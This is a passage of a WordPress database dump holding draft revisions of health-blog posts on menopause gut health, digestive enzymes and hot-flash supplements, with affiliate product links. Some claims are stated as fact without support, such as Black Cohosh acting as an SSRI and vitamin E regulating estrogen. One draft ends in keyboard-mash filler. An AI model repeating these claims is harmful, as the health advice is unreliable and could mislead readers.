LINK TO THE RECOMMENDED BEST PROBIOTICS TO SUPPORT YOUR GUT HEALTH AFTER MENOPAUSE

\n\n\n\n

\n\n\n\n

Conclusion

\n\n\n\n

Prioritizing gut health after menopause is a valuable investment in your overall well-being. By making mindful dietary choices, incorporating probiotic-rich and prebiotic foods, managing stress, and adopting

\n','Nurse Your Gut Health After Menopause: Essential Strategies','','publish','open','open','','nurse-your-gut-health-after-menopause-essential-strategies','','\nhttps://tummyrevolution.com/the-best-probiotics-to-support-your-gut-health-after-menopause/','2023-10-10 08:26:51','2023-10-10 08:26:51','',0,'https://tummyrevolution.com/?p=5606',0,'post','',0),(5607,3,'2023-09-17 14:19:54','2023-09-17 14:19:54','','zoltan-tasi-vHnVtLK8rCc-unsplash','','inherit','open','closed','','zoltan-tasi-vhnvtlk8rcc-unsplash','','','2023-09-17 14:19:54','2023-09-17 14:19:54','',5606,'http://tummyrevolution.com/wp-content/uploads/2023/09/zoltan-tasi-vHnVtLK8rCc-unsplash.jpg',0,'attachment','image/jpeg',0),(5608,3,'2023-09-17 14:21:24','2023-09-17 14:21:24','\n

Women transition through menopause, they experience a range of physical and hormonal changes that can impact various aspects of their health, including gut health. Maintaining a balanced and healthy gut becomes even more crucial during this phase, as it can help alleviate digestive issues and contribute to overall well-being. In this blog, we\'ll explore the connection between menopause and gut health and provide actionable strategies to improve and maintain gut health post-menopause.

\n\n\n\n

The Menopause-Gut Health Connection

\n\n\n\n

The gut microbiome plays a vital role in digestion, nutrient absorption, immune function, and even mood regulation. During menopause, hormonal fluctuations can disrupt the delicate balance of the gut microbiota, potentially leading to digestive problems such as bloating, constipation, and increased gas. Additionally, shifts in hormones can influence gut sensitivity, potentially exacerbating conditions like irritable bowel syndrome (IBS).

\n\n\n\n

Strategies to Improve Gut Health After Menopause

\n\n\n\n
    \n
  1. Prioritize Fiber-Rich Foods:
  2. \n\n\n\n
  3. Include a variety of fiber-rich foods such as whole grains, fruits, vegetables, legumes, and nuts in your diet. Fiber promotes regular bowel movements, supports the growth of beneficial gut bacteria, and helps maintain a healthy gut lining.
  4. \n\n\n\n
  5. Stay Hydrated:
  6. \n\n\n\n
  7. Drinking an adequate amount of water supports healthy digestion, prevents constipation, and aids in the absorption of nutrients. Aim for at least 8 glasses of water per day.
  8. \n\n\n\n
  9. Incorporate Probiotics:
  10. \n\n\n\n
  11. Probiotics are beneficial bacteria that can enhance gut health. You can find probiotics in fermented foods like yogurt, kefir, sauerkraut, kimchi, and kombucha. Alternatively, consider taking a high-quality probiotic supplement after consulting your healthcare provider.
  12. \n\n\n\n
  13. Choose Prebiotic Foods:
  14. \n\n\n\n
  15. Prebiotics are non-digestible fibers that nourish beneficial gut bacteria. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can support a diverse and healthy gut microbiome.
  16. \n\n\n\n
  17. Minimize Processed Foods and Sugar:
  18. \n\n\n\n
  19. High intake of processed foods and added sugars can negatively affect gut health by promoting the growth of harmful bacteria. Focus on whole, unprocessed foods to support a balanced microbiome.
  20. \n
\n\n\n\n

Manage Stress:

\n\n\n\n
    \n
  • Chronic stress can disrupt the gut-brain connection and impact gut health. Engage in stress-reduction techniques such as meditation, deep breathing, yoga, or mindfulness to support both mental well-being and gut health.
  • \n\n\n\n
  • Regular Physical Activity:
  • \n\n\n\n
  • Exercise has been shown to positively influence gut health by promoting the growth of beneficial bacteria. Aim for regular moderate-intensity activities like walking, swimming, or cycling.
  • \n\n\n\n
  • Limit Alcohol and Caffeine:
  • \n\n\n\n
  • Excessive alcohol and caffeine consumption can irritate the gut lining and disrupt gut balance. Moderation is key to maintaining gut health.
  • \n\n\n\n
  • Avoid Antibiotic Overuse:
  • \n\n\n\n
  • While antibiotics are sometimes necessary, overuse can disturb the gut microbiome. Discuss alternatives and potential probiotic supplementation with your healthcare provider when taking antibiotics.
  • \n\n\n\n
  • Consult a Professional:
  • \n\n\n\n
  • If you\'re experiencing persistent gut issues, consider consulting a registered dietitian or healthcare provider who can offer personalized advice and recommendations.
  • \n
\n\n\n\n

LINK TILL

\n\n\n\n

The Best Probiotics to Support Your Gut Health After Menopause

\n\n\n\n

Conclusion

\n\n\n\n

Prioritizing gut health after menopause is a valuable investment in your overall well-being. By making mindful dietary choices, incorporating probiotic-rich and prebiotic foods, managing stress, and adopting

\n','Nurse Your Gut Health After Menopause: Essential Strategies','','inherit','closed','closed','','5606-revision-v1','','','2023-09-17 14:21:24','2023-09-17 14:21:24','',5606,'https://tummyrevolution.com/?p=5608',0,'revision','',0),(5610,1,'2023-09-19 09:24:29','2023-09-19 09:24:29','','Navigation','','publish','closed','closed','','navigation','','','2023-09-19 09:24:29','2023-09-19 09:24:29','',0,'https://tummyrevolution.com/navigation/',0,'wp_navigation','',0),(5611,1,'2023-09-19 09:27:45','2023-09-19 09:27:45','\n
\n

Enzymes might sound like complex chemical compounds, but they are actually tiny molecular machines that play a pivotal role in our bodies and the natural world. Often referred to as the \"catalysts of life,\" enzymes are essential for a multitude of biochemical processes that keep our bodies functioning smoothly. In this article, we\'ll delve into the fascinating world of enzymes, understanding what they are and why they are so crucial for our well-being.

\n\n\n\n

What Are Enzymes?

\n\n\n\n

Enzymes are protein molecules with a unique structure that enables them to accelerate chemical reactions without being consumed or altered in the process. Think of them as nature\'s microscopic workers, facilitating reactions that would otherwise be too slow to sustain life. Enzymes work by binding to specific molecules, known as substrates, and then transforming them into products through a series of precisely orchestrated steps.

\n\n\n\n

Enzymes in Digestion

\n\n\n\n

One of the most well-known roles of enzymes is in the digestive system. Digestive enzymes help break down complex nutrients into smaller, more absorbable forms that the body can use. For example, amylase enzymes break down carbohydrates into sugars, protease enzymes break down proteins into amino acids, and lipase enzymes break down fats into fatty acids and glycerol. This breakdown process is crucial for nutrient absorption and energy production.

\n\n\n\n

Enzymes and Cellular Processes

\n\n\n\n

Enzymes are not limited to digestion; they are involved in virtually every cellular process within our bodies. From DNA replication and repair to the synthesis of new molecules, enzymes regulate and accelerate these processes to ensure our cells function optimally. Without enzymes, essential cellular functions would be sluggish or non-existent.

\n\n\n\n

Health Benefits of Enzymes

\n\n\n\n

Enzymes also offer several health benefits beyond digestion and cellular processes:

\n\n\n\n
    \n
  1. Digestive Health: Enzyme supplements can aid individuals with digestive disorders, such as lactose intolerance or gluten sensitivity, by assisting in the breakdown of specific compounds that might otherwise cause discomfort.
  2. \n\n\n\n
  3. Inflammation Reduction: Some enzymes possess anti-inflammatory properties, helping to modulate the body\'s immune response and reduce inflammation associated with various health conditions.
  4. \n\n\n\n
  5. Nutrient Absorption: By aiding in the breakdown of nutrients, enzymes enhance nutrient absorption, which can lead to improved overall health and energy levels.
  6. \n\n\n\n
  7. Gut Health: Certain enzymes, such as proteolytic enzymes, are believed to promote a healthy gut environment by breaking down harmful proteins and supporting the growth of beneficial bacteria.
  8. \n\n\n\n
  9. Metabolism Boost: Enzymes play a role in metabolism, and their proper function can contribute to a balanced metabolic rate.
  10. \n
\n\n\n\n

Conclusion

\n\n\n\n

Enzymes are the unsung heroes of life, driving essential biochemical reactions that sustain us from the cellular level to the systems that keep us alive and well. Without these molecular catalysts, life as we know it would be impossible. From aiding in digestion to supporting overall health, enzymes are a testament to the intricate design of our bodies and the power of nature\'s biochemical processes. So, the next time you enjoy a meal or marvel at the marvels of life, remember the remarkable work of enzymes that make it all possible.

\n
\n\n\n\n

Here are our top 10 recommended enzyme supplements

\n\n\n\n
    \n
  1. Digest Gold
  2. \n
\n\n\n\n\"\"\n','Unlocking the Power of Enzymes: Nature\'s Catalysts for Vital Processes','','inherit','closed','closed','','5446-revision-v1','','','2023-09-19 09:27:45','2023-09-19 09:27:45','',5446,'https://tummyrevolution.com/?p=5611',0,'revision','',0),(5640,1,'2023-09-19 18:01:46','2023-09-19 18:01:46','\n
\n

Enzymes might sound like complex chemical compounds, but they are actually tiny molecular machines that play a pivotal role in our bodies and the natural world. Often referred to as the \"catalysts of life,\" enzymes are essential for a multitude of biochemical processes that keep our bodies functioning smoothly. In this article, we\'ll delve into the fascinating world of enzymes, understanding what they are and why they are so crucial for our well-being.

\n\n\n\n

What Are Enzymes?

\n\n\n\n

Enzymes are protein molecules with a unique structure that enables them to accelerate chemical reactions without being consumed or altered in the process. Think of them as nature\'s microscopic workers, facilitating reactions that would otherwise be too slow to sustain life. Enzymes work by binding to specific molecules, known as substrates, and then transforming them into products through a series of precisely orchestrated steps.

\n\n\n\n

Enzymes in Digestion

\n\n\n\n

One of the most well-known roles of enzymes is in the digestive system. Digestive enzymes help break down complex nutrients into smaller, more absorbable forms that the body can use. For example, amylase enzymes break down carbohydrates into sugars, protease enzymes break down proteins into amino acids, and lipase enzymes break down fats into fatty acids and glycerol. This breakdown process is crucial for nutrient absorption and energy production.

\n\n\n\n

Enzymes and Cellular Processes

\n\n\n\n

Enzymes are not limited to digestion; they are involved in virtually every cellular process within our bodies. From DNA replication and repair to the synthesis of new molecules, enzymes regulate and accelerate these processes to ensure our cells function optimally. Without enzymes, essential cellular functions would be sluggish or non-existent.

\n\n\n\n

Health Benefits of Enzymes

\n\n\n\n

Enzymes also offer several health benefits beyond digestion and cellular processes:

\n\n\n\n
    \n
  1. Digestive Health: Enzyme supplements can aid individuals with digestive disorders, such as lactose intolerance or gluten sensitivity, by assisting in the breakdown of specific compounds that might otherwise cause discomfort.
  2. \n\n\n\n
  3. Inflammation Reduction: Some enzymes possess anti-inflammatory properties, helping to modulate the body\'s immune response and reduce inflammation associated with various health conditions.
  4. \n\n\n\n
  5. Nutrient Absorption: By aiding in the breakdown of nutrients, enzymes enhance nutrient absorption, which can lead to improved overall health and energy levels.
  6. \n\n\n\n
  7. Gut Health: Certain enzymes, such as proteolytic enzymes, are believed to promote a healthy gut environment by breaking down harmful proteins and supporting the growth of beneficial bacteria.
  8. \n\n\n\n
  9. Metabolism Boost: Enzymes play a role in metabolism, and their proper function can contribute to a balanced metabolic rate.
  10. \n
\n\n\n\n

Conclusion

\n\n\n\n

Enzymes are the unsung heroes of life, driving essential biochemical reactions that sustain us from the cellular level to the systems that keep us alive and well. Without these molecular catalysts, life as we know it would be impossible. From aiding in digestion to supporting overall health, enzymes are a testament to the intricate design of our bodies and the power of nature\'s biochemical processes. So, the next time you enjoy a meal or marvel at the marvels of life, remember the remarkable work of enzymes that make it all possible.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you chose to make a purchase using my links

\n
\n\n\n\n

Here are our top 10 enzyme supplement recommendations

\n\n\n\n

Biocare Polyzyme Forte - High potency broad spectrum digestive enzymes

\n\n\n\n\"\"\n\n\n\n

Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 120 Capsules

\n\n\n\n\"\"\n\n\n

','Unlocking the Power of Enzymes: Nature\'s Catalysts for Vital Processes','','inherit','closed','closed','','5446-revision-v1','','','2023-09-19 18:01:46','2023-09-19 18:01:46','',5446,'https://tummyrevolution.com/?p=5640',0,'revision','',0),(5638,1,'2023-09-19 17:57:00','2023-09-19 17:57:00','\n
\n

Enzymes might sound like complex chemical compounds, but they are actually tiny molecular machines that play a pivotal role in our bodies and the natural world. Often referred to as the \"catalysts of life,\" enzymes are essential for a multitude of biochemical processes that keep our bodies functioning smoothly. In this article, we\'ll delve into the fascinating world of enzymes, understanding what they are and why they are so crucial for our well-being.

\n\n\n\n

What Are Enzymes?

\n\n\n\n

Enzymes are protein molecules with a unique structure that enables them to accelerate chemical reactions without being consumed or altered in the process. Think of them as nature\'s microscopic workers, facilitating reactions that would otherwise be too slow to sustain life. Enzymes work by binding to specific molecules, known as substrates, and then transforming them into products through a series of precisely orchestrated steps.

\n\n\n\n

Enzymes in Digestion

\n\n\n\n

One of the most well-known roles of enzymes is in the digestive system. Digestive enzymes help break down complex nutrients into smaller, more absorbable forms that the body can use. For example, amylase enzymes break down carbohydrates into sugars, protease enzymes break down proteins into amino acids, and lipase enzymes break down fats into fatty acids and glycerol. This breakdown process is crucial for nutrient absorption and energy production.

\n\n\n\n

Enzymes and Cellular Processes

\n\n\n\n

Enzymes are not limited to digestion; they are involved in virtually every cellular process within our bodies. From DNA replication and repair to the synthesis of new molecules, enzymes regulate and accelerate these processes to ensure our cells function optimally. Without enzymes, essential cellular functions would be sluggish or non-existent.

\n\n\n\n

Health Benefits of Enzymes

\n\n\n\n

Enzymes also offer several health benefits beyond digestion and cellular processes:

\n\n\n\n
    \n
  1. Digestive Health: Enzyme supplements can aid individuals with digestive disorders, such as lactose intolerance or gluten sensitivity, by assisting in the breakdown of specific compounds that might otherwise cause discomfort.
  2. \n\n\n\n
  3. Inflammation Reduction: Some enzymes possess anti-inflammatory properties, helping to modulate the body\'s immune response and reduce inflammation associated with various health conditions.
  4. \n\n\n\n
  5. Nutrient Absorption: By aiding in the breakdown of nutrients, enzymes enhance nutrient absorption, which can lead to improved overall health and energy levels.
  6. \n\n\n\n
  7. Gut Health: Certain enzymes, such as proteolytic enzymes, are believed to promote a healthy gut environment by breaking down harmful proteins and supporting the growth of beneficial bacteria.
  8. \n\n\n\n
  9. Metabolism Boost: Enzymes play a role in metabolism, and their proper function can contribute to a balanced metabolic rate.
  10. \n
\n\n\n\n

Conclusion

\n\n\n\n

Enzymes are the unsung heroes of life, driving essential biochemical reactions that sustain us from the cellular level to the systems that keep us alive and well. Without these molecular catalysts, life as we know it would be impossible. From aiding in digestion to supporting overall health, enzymes are a testament to the intricate design of our bodies and the power of nature\'s biochemical processes. So, the next time you enjoy a meal or marvel at the marvels of life, remember the remarkable work of enzymes that make it all possible.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you chose to make a purchase using my links

\n
\n\n\n\n

Here are our top 10 enzyme supplement recommendations

\n\n\n\n

Biocare Polyzyme Forte - High potency broad spectrum digestive enzymes

\n\n\n\n\"\"\n\n\n\n

Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 120 Capsules

\n\n\n\n\"\"\n\n\n

 

\n



','Unlocking the Power of Enzymes: Nature\'s Catalysts for Vital Processes','','inherit','closed','closed','','5446-revision-v1','','','2023-09-19 17:57:00','2023-09-19 17:57:00','',5446,'https://tummyrevolution.com/?p=5638',0,'revision','',0),(5613,3,'2023-09-19 09:48:53','2023-09-19 09:48:53','\n

Menopause is a natural transition in a woman\'s life, marking the end of her reproductive years. While this phase brings about various changes, one of the most common and uncomfortable symptoms is hot flashes. These sudden, intense sensations of heat can disrupt daily life and sleep patterns. While there\'s no magic cure for hot flashes, certain supplements have shown promise in helping to alleviate this symptom. In this blog post, we\'ll explore three of the best supplements for managing hot flashes during menopause.

\n\n\n\n

1.Black Cohosh

\n\n\n\n\"\"\n\n\n\n
\"\"/
\n\n\n\n\n\n\n\n

Black Cohosh is a herb native to North America and has been used for centuries to address menopausal symptoms, including hot flashes. Research suggests that Black Cohosh may help regulate hormone levels in the body, particularly estrogen, which can fluctuate dramatically during menopause.

\n\n\n\n

How it works:

\n\n\n\n

1.Black Cohosh may act as a natural selective serotonin reuptake inhibitor (SSRI), which can help stabilize mood and reduce the frequency and intensity of hot flashes. It may also have anti-inflammatory properties that help alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

\n\n\n\n

Typical doses range from 20 to 40 milligrams per day in the form of capsules or tablets.

\n\n\n\n

Consult with a healthcare professional before starting any supplement regimen, as they can provide personalized recommendations based on your specific needs.

\n\n\n\n

\n\n\n\n

2.Vitamin E

\n\n\n\n

Vitamin E is a powerful antioxidant that plays a crucial role in maintaining overall health. Some studies suggest that vitamin E supplementation can be effective in reducing the frequency and severity of hot flashes during menopause.

\n\n\n\n

How it works:

\n\n\n\n

Vitamin E helps regulate estrogen levels in the body, which can help mitigate hot flashes. Its antioxidant properties may also help protect cells and tissues from oxidative stress, potentially reducing the intensity of hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

The recommended daily intake of vitamin E for adults is around 15 milligrams (22.4 IU). However, consult with a healthcare provider before taking vitamin E supplements, as excessive intake can have adverse effects.

\n\n\n\n

3. Evening Primrose Oil

\n\n\n\n

Evening Primrose Oil is extracted from the seeds of the Evening Primrose plant and is rich in gamma-linolenic acid (GLA), an essential fatty acid. Some women find relief from menopausal symptoms, including hot flashes, when taking Evening Primrose Oil.

\n\n\n\n

How it works:

\n\n\n\n

GLA in Evening Primrose Oil may help regulate hormonal imbalances and reduce the intensity of hot flashes. The anti-inflammatory properties of GLA can also alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 500 to 1,000 milligrams daily, divided into two or three doses.

\n\n\n\n

Consult with a healthcare professional to determine the right dosage for your specific needs.

\n\n\n\n

Conclusion

\n\n\n\n

While these supplements may offer relief from hot flashes during menopause, it\'s essential to remember that their effectiveness can vary from person to person. Additionally, individual factors, such as overall health and hormonal imbalances, may influence the outcomes. It\'s crucial to consult with a healthcare provider before adding any supplements to your routine, as they can provide personalized guidance and ensure they won\'t interact negatively with any other medications you may be taking. Combining supplements with a healthy lifestyle, including a balanced diet, regular exercise, and stress management, can help you navigate menopause with greater ease and comfort.

\n','Three Best Supplements for Hot Flashes During Menopause','','inherit','closed','closed','','5506-revision-v1','','','2023-09-19 09:48:53','2023-09-19 09:48:53','',5506,'https://tummyrevolution.com/?p=5613',0,'revision','',0),(5612,1,'2023-09-19 09:46:37','2023-09-19 09:46:37','\n
\n

Enzymes might sound like complex chemical compounds, but they are actually tiny molecular machines that play a pivotal role in our bodies and the natural world. Often referred to as the \"catalysts of life,\" enzymes are essential for a multitude of biochemical processes that keep our bodies functioning smoothly. In this article, we\'ll delve into the fascinating world of enzymes, understanding what they are and why they are so crucial for our well-being.

\n\n\n\n

What Are Enzymes?

\n\n\n\n

Enzymes are protein molecules with a unique structure that enables them to accelerate chemical reactions without being consumed or altered in the process. Think of them as nature\'s microscopic workers, facilitating reactions that would otherwise be too slow to sustain life. Enzymes work by binding to specific molecules, known as substrates, and then transforming them into products through a series of precisely orchestrated steps.

\n\n\n\n

Enzymes in Digestion

\n\n\n\n

One of the most well-known roles of enzymes is in the digestive system. Digestive enzymes help break down complex nutrients into smaller, more absorbable forms that the body can use. For example, amylase enzymes break down carbohydrates into sugars, protease enzymes break down proteins into amino acids, and lipase enzymes break down fats into fatty acids and glycerol. This breakdown process is crucial for nutrient absorption and energy production.

\n\n\n\n

Enzymes and Cellular Processes

\n\n\n\n

Enzymes are not limited to digestion; they are involved in virtually every cellular process within our bodies. From DNA replication and repair to the synthesis of new molecules, enzymes regulate and accelerate these processes to ensure our cells function optimally. Without enzymes, essential cellular functions would be sluggish or non-existent.

\n\n\n\n

Health Benefits of Enzymes

\n\n\n\n

Enzymes also offer several health benefits beyond digestion and cellular processes:

\n\n\n\n
    \n
  1. Digestive Health: Enzyme supplements can aid individuals with digestive disorders, such as lactose intolerance or gluten sensitivity, by assisting in the breakdown of specific compounds that might otherwise cause discomfort.
  2. \n\n\n\n
  3. Inflammation Reduction: Some enzymes possess anti-inflammatory properties, helping to modulate the body\'s immune response and reduce inflammation associated with various health conditions.
  4. \n\n\n\n
  5. Nutrient Absorption: By aiding in the breakdown of nutrients, enzymes enhance nutrient absorption, which can lead to improved overall health and energy levels.
  6. \n\n\n\n
  7. Gut Health: Certain enzymes, such as proteolytic enzymes, are believed to promote a healthy gut environment by breaking down harmful proteins and supporting the growth of beneficial bacteria.
  8. \n\n\n\n
  9. Metabolism Boost: Enzymes play a role in metabolism, and their proper function can contribute to a balanced metabolic rate.
  10. \n
\n\n\n\n

Conclusion

\n\n\n\n

Enzymes are the unsung heroes of life, driving essential biochemical reactions that sustain us from the cellular level to the systems that keep us alive and well. Without these molecular catalysts, life as we know it would be impossible. From aiding in digestion to supporting overall health, enzymes are a testament to the intricate design of our bodies and the power of nature\'s biochemical processes. So, the next time you enjoy a meal or marvel at the marvels of life, remember the remarkable work of enzymes that make it all possible.

\n
\n\n\n\n

Here are our top 10 recommended enzyme supplements

\n\n\n\n
    \n
  1. Digest Gold
  2. \n
\n\n\n\n\"\"\n\n\n

this is a supplements that combines enzymes with probiotics to provide an improved gut health environment  blsdddjdjdjdjbhfsljuakusfbq

\n

ksbfkjasbckjsabdkjSBDKjsbbjksDBskjdbkjBDljkbdBDljbdljBDljbdljBDlbdlbdljBDSljbdlABDLbd

','Unlocking the Power of Enzymes: Nature\'s Catalysts for Vital Processes','','inherit','closed','closed','','5446-revision-v1','','','2023-09-19 09:46:37','2023-09-19 09:46:37','',5446,'https://tummyrevolution.com/?p=5612',0,'revision','',0),(5614,3,'2023-09-19 11:43:52','2023-09-19 11:43:52','\n

Menopause is a natural transition in a woman\'s life, marking the end of her reproductive years. While this phase brings about various changes, one of the most common and uncomfortable symptoms is hot flashes. These sudden, intense sensations of heat can disrupt daily life and sleep patterns. While there\'s no magic cure for hot flashes, certain supplements have shown promise in helping to alleviate this symptom. In this blog post, we\'ll explore three of the best supplements for managing hot flashes during menopause.

\n\n\n\n

1.Black Cohosh

\n\n\n\n\"\"\n\n\n\n
\"\"/
\n\n\n\n\n\n\n\n

Black Cohosh is a herb native to North America and has been used for centuries to address menopausal symptoms, including hot flashes. Research suggests that Black Cohosh may help regulate hormone levels in the body, particularly estrogen, which can fluctuate dramatically during menopause.

\n\n\n\n

How it works:

\n\n\n\n

1.Black Cohosh may act as a natural selective serotonin reuptake inhibitor (SSRI), which can help stabilize mood and reduce the frequency and intensity of hot flashes. It may also have anti-inflammatory properties that help alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

\n\n\n\n

Typical doses range from 20 to 40 milligrams per day in the form of capsules or tablets.

\n\n\n\n

Consult with a healthcare professional before starting any supplement regimen, as they can provide personalized recommendations based on your specific needs.

\n\n\n\nhttps://www.amazon.com/Advanced-Menopause-Supplement-Irritability-Estrogen-Free/dp/B07JGMWJLY?crid=UP3Z5X8C3DJR&keywords=c+vitamin+complex+menopause+Supplements&qid=1693557633&sprefix=c+vitamin+complex+menopause+supplements%2Caps%2C353&sr=8-17-spons&sp_csd=d2lkZ2V0TmFtZT1zcF9tdGY&psc=1&linkCode=ll1&tag=tummyrevoluti-20&linkId=3a11b0ca3d573fe47bb803d3089b9a9b&language=en_US&ref_=as_li_ss_tl\n\n\n\n\n\n

2.Vitamin E

\n\n\n\n

Vitamin E is a powerful antioxidant that plays a crucial role in maintaining overall health. Some studies suggest that vitamin E supplementation can be effective in reducing the frequency and severity of hot flashes during menopause.

\n\n\n\n

How it works:

\n\n\n\n

Vitamin E helps regulate estrogen levels in the body, which can help mitigate hot flashes. Its antioxidant properties may also help protect cells and tissues from oxidative stress, potentially reducing the intensity of hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

The recommended daily intake of vitamin E for adults is around 15 milligrams (22.4 IU). However, consult with a healthcare provider before taking vitamin E supplements, as excessive intake can have adverse effects.

\n\n\n\n

3. Evening Primrose Oil

\n\n\n\n

Evening Primrose Oil is extracted from the seeds of the Evening Primrose plant and is rich in gamma-linolenic acid (GLA), an essential fatty acid. Some women find relief from menopausal symptoms, including hot flashes, when taking Evening Primrose Oil.

\n\n\n\n

How it works:

\n\n\n\n

GLA in Evening Primrose Oil may help regulate hormonal imbalances and reduce the intensity of hot flashes. The anti-inflammatory properties of GLA can also alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 500 to 1,000 milligrams daily, divided into two or three doses.

\n\n\n\n

Consult with a healthcare professional to determine the right dosage for your specific needs.

\n\n\n\n

Conclusion

\n\n\n\n

While these supplements may offer relief from hot flashes during menopause, it\'s essential to remember that their effectiveness can vary from person to person. Additionally, individual factors, such as overall health and hormonal imbalances, may influence the outcomes. It\'s crucial to consult with a healthcare provider before adding any supplements to your routine, as they can provide personalized guidance and ensure they won\'t interact negatively with any other medications you may be taking. Combining supplements with a healthy lifestyle, including a balanced diet, regular exercise, and stress management, can help you navigate menopause with greater ease and comfort.

\n','Three Best Supplements for Hot Flashes During Menopause','','inherit','closed','closed','','5506-revision-v1','','','2023-09-19 11:43:52','2023-09-19 11:43:52','',5506,'https://tummyrevolution.com/?p=5614',0,'revision','',0),(5615,3,'2023-09-19 12:07:40','2023-09-19 12:07:40','\n

Menopause is a natural transition in a woman\'s life, marking the end of her reproductive years. While this phase brings about various changes, one of the most common and uncomfortable symptoms is hot flashes. These sudden, intense sensations of heat can disrupt daily life and sleep patterns. While there\'s no magic cure for hot flashes, certain supplements have shown promise in helping to alleviate this symptom. In this blog post, we\'ll explore three of the best supplements for managing hot flashes during menopause.

\n\n\n\n

1.Black Cohosh

\n\n\n\n\"\"\n\n\n\n
\"\"/
\n\n\n\n\n\n\n\n\"\"\n\n\n\n

\"\"

\n\n\n

Black Cohosh is a herb native to North America and has been used for centuries to address menopausal symptoms, including hot flashes. Research suggests that Black Cohosh may help regulate hormone levels in the body, particularly estrogen, which can fluctuate dramatically during menopause.

\n\n\n\n

How it works:

\n\n\n\n

1.Black Cohosh may act as a natural selective serotonin reuptake inhibitor (SSRI), which can help stabilize mood and reduce the frequency and intensity of hot flashes. It may also have anti-inflammatory properties that help alleviate discomfort associated with hot flashes.

\n\n\n\n

\n\n\n\n

Dosage:

\n\n\n\n

\n\n\n\n

Typical doses range from 20 to 40 milligrams per day in the form of capsules or tablets.

\n\n\n\n

Consult with a healthcare professional before starting any supplement regimen, as they can provide personalized recommendations based on your specific needs.

\n\n\n\n

Recommended Product

\n\n\n\n

2.Vitamin E

\n\n\n\n

Vitamin E is a powerful antioxidant that plays a crucial role in maintaining overall health. Some studies suggest that vitamin E supplementation can be effective in reducing the frequency and severity of hot flashes during menopause.

\n\n\n\n

How it works:

\n\n\n\n

Vitamin E helps regulate estrogen levels in the body, which can help mitigate hot flashes. Its antioxidant properties may also help protect cells and tissues from oxidative stress, potentially reducing the intensity of hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

The recommended daily intake of vitamin E for adults is around 15 milligrams (22.4 IU). However, consult with a healthcare provider before taking vitamin E supplements, as excessive intake can have adverse effects.

\n\n\n\n

3. Evening Primrose Oil

\n\n\n\n

Evening Primrose Oil is extracted from the seeds of the Evening Primrose plant and is rich in gamma-linolenic acid (GLA), an essential fatty acid. Some women find relief from menopausal symptoms, including hot flashes, when taking Evening Primrose Oil.

\n\n\n\n

How it works:

\n\n\n\n

GLA in Evening Primrose Oil may help regulate hormonal imbalances and reduce the intensity of hot flashes. The anti-inflammatory properties of GLA can also alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 500 to 1,000 milligrams daily, divided into two or three doses.

\n\n\n\n

Consult with a healthcare professional to determine the right dosage for your specific needs.

\n\n\n\n

Conclusion

\n\n\n\n

While these supplements may offer relief from hot flashes during menopause, it\'s essential to remember that their effectiveness can vary from person to person. Additionally, individual factors, such as overall health and hormonal imbalances, may influence the outcomes. It\'s crucial to consult with a healthcare provider before adding any supplements to your routine, as they can provide personalized guidance and ensure they won\'t interact negatively with any other medications you may be taking. Combining supplements with a healthy lifestyle, including a balanced diet, regular exercise, and stress management, can help you navigate menopause with greater ease and comfort.

\n','Three Best Supplements for Hot Flashes During Menopause','','inherit','closed','closed','','5506-revision-v1','','','2023-09-19 12:07:40','2023-09-19 12:07:40','',5506,'https://tummyrevolution.com/?p=5615',0,'revision','',0),(5617,3,'2023-09-19 12:30:01','2023-09-19 12:30:01','\n

Menopause is a natural transition in a woman\'s life, marking the end of her reproductive years. While this phase brings about various changes, one of the most common and uncomfortable symptoms is hot flashes. These sudden, intense sensations of heat can disrupt daily life and sleep patterns. While there\'s no magic cure for hot flashes, certain supplements have shown promise in helping to alleviate this symptom. In this blog post, we\'ll explore three of the best supplements for managing hot flashes during menopause.

\n\n\n\n

1.Black Cohosh

\n\n\n\n\n\n\n

\"\"

\n\n\n

Black Cohosh is a herb native to North America and has been used for centuries to address menopausal symptoms, including hot flashes. Research suggests that Black Cohosh may help regulate hormone levels in the body, particularly estrogen, which can fluctuate dramatically during menopause.

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

How it works:

\n\n\n\n

1.Black Cohosh may act as a natural selective serotonin reuptake inhibitor (SSRI), which can help stabilize mood and reduce the frequency and intensity of hot flashes. It may also have anti-inflammatory properties that help alleviate discomfort associated with hot flashes.

\n\n\n\n

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 20 to 40 milligrams per day in the form of capsules or tablets.

\n\n\n\n

Consult with a healthcare professional before starting any supplement regimen, as they can provide personalized recommendations based on your specific needs.

\n\n\n\n

Recommended Product

\n\n\n\n

\n\n\n\n

\n\n\n\n

2.Vitamin E

\n\n\n\n\"\"\n\n\n

\"\"

\n

 

\n

 

\n

Vitamin E is a powerful antioxidant that plays a crucial role in maintaining overall health. Some studies suggest that vitamin E supplementation can be effective in reducing the frequency and severity of hot flashes during menopause.

\n\n\n

How it works:

\n\n\n\n

Vitamin E helps regulate estrogen levels in the body, which can help mitigate hot flashes. Its antioxidant properties may also help protect cells and tissues from oxidative stress, potentially reducing the intensity of hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

The recommended daily intake of vitamin E for adults is around 15 milligrams (22.4 IU). However, consult with a healthcare provider before taking vitamin E supplements, as excessive intake can have adverse effects.

\n\n\n\n

Recommended Product

\n\n\n\n

\n\n\n\n

3. Evening Primrose Oil

\n\n\n\n

Evening Primrose Oil is extracted from the seeds of the Evening Primrose plant and is rich in gamma-linolenic acid (GLA), an essential fatty acid. Some women find relief from menopausal symptoms, including hot flashes, when taking Evening Primrose Oil.

\n\n\n\n

How it works:

\n\n\n\n

